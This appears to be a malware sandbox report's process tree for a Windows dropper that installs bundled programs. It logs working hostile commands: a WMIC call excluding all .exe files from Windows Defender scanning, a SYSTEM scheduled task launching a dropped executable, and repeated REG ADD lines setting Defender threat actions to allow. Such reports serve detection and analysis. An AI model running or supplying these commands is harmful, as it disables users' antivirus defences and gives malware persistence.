        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3632 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        18⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1204 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        18⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        17⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        15⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        15⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        15⤵
        
        PID:7224
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        15⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        13⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        12⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3660 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        11⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3840 --field-trial-handle=2908,i,6260512507937252366,17551788494918539573,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        11⤵
        
        PID:7144
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        10⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        9⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        8⤵
        
        PID:1172
  - - C:\Users\Admin\AppData\Local\Temp\viqyHqQ1\a3jiZHv4RuYAP2o6kdPT.exe
      C:\Users\Admin\AppData\Local\Temp\viqyHqQ1\a3jiZHv4RuYAP2o6kdPT.exe
      4⤵
      Executes dropped EXE
      PID:3216
    - - C:\Users\Admin\AppData\Local\Temp\is-O60OF.tmp\is-KGL92.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O60OF.tmp\is-KGL92.tmp" /SL4 $304C4 "C:\Users\Admin\AppData\Local\Temp\viqyHqQ1\a3jiZHv4RuYAP2o6kdPT.exe" 4980556 52224
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
        
        "C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:4496
      - C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
        
        "C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:5916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\n7aMb2gA\KPeVsWkf.exe"
      4⤵
      PID:5364
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\n7aMb2gA\KPeVsWkf.exe"
        5⤵
        
        PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\n7aMb2gA\KPeVsWkf.exe
      C:\Users\Admin\AppData\Local\Temp\n7aMb2gA\KPeVsWkf.exe -6wqfqov40w8wuojd26si1tc58hxkkp5v
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:1600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe"
      4⤵
      PID:4872
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe"
        5⤵
        
        PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe
      C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      PID:1144
    - - C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe
        
        C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x7269e1d0,0x7269e1dc,0x7269e1e8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1716
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\v925bE0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\v925bE0.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1144 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240415200839" --session-guid=72df2810-1025-4c6c-af3a-abb91aa7e2d0 --server-tracking-blob=Yjg2NzE5YTU4N2I5ZGEyODcyNjQ0YmNhMzQwNjUxZGUzNzA4M2M3Mjk2ZDU3MzlhZTUxNTg0N2MxZmNlNmNiYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMzIxMTcxMC43NjU3IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIxNzA5NzFjOC1mYzhjLTRlODMtOWY3NC01NjEyZDQ1YmJmNzIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A405000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:5416
      - C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe
        
        C:\Users\Admin\AppData\Local\Temp\6ipU7RIr\v925bE0.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2a8,0x2d8,0x719de1d0,0x719de1dc,0x719de1e8
        6⤵
        Loads dropped DLL
        
        PID:4636
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
        5⤵
        
        PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\assistant_installer.exe" --version
        5⤵
        Loads dropped DLL
        
        PID:5244
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404152008391\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x5e6038,0x5e6044,0x5e6050
        6⤵
        Loads dropped DLL
        
        PID:768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RPTxWO0q\MnBDI.exe"
      4⤵
      PID:4640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RPTxWO0q\MnBDI.exe"
        5⤵
        
        PID:4064
  - - C:\Users\Admin\AppData\Local\Temp\RPTxWO0q\MnBDI.exe
      C:\Users\Admin\AppData\Local\Temp\RPTxWO0q\MnBDI.exe /did=757674 /S
      4⤵
      Checks BIOS information in registry
      Enumerates system info in registry
      PID:3020
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:3332
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bUgrpDbixCAhXFfIKo" /SC once /ST 20:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr\IqwwwXZqeiyNcQv\HvMFTkC.exe\" YA /Yssite_idlqE 757674 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1484

C:\Program Files\WProxy\WinProxy\WinProxy.exe
"C:\Program Files\WProxy\WinProxy\WinProxy.exe"
1⤵
- Loads dropped DLL
PID:5016

C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr\IqwwwXZqeiyNcQv\HvMFTkC.exe
C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr\IqwwwXZqeiyNcQv\HvMFTkC.exe YA /Yssite_idlqE 757674 /S
1⤵
- Drops file in System32 directory
PID:5336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3184
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\reg.exe
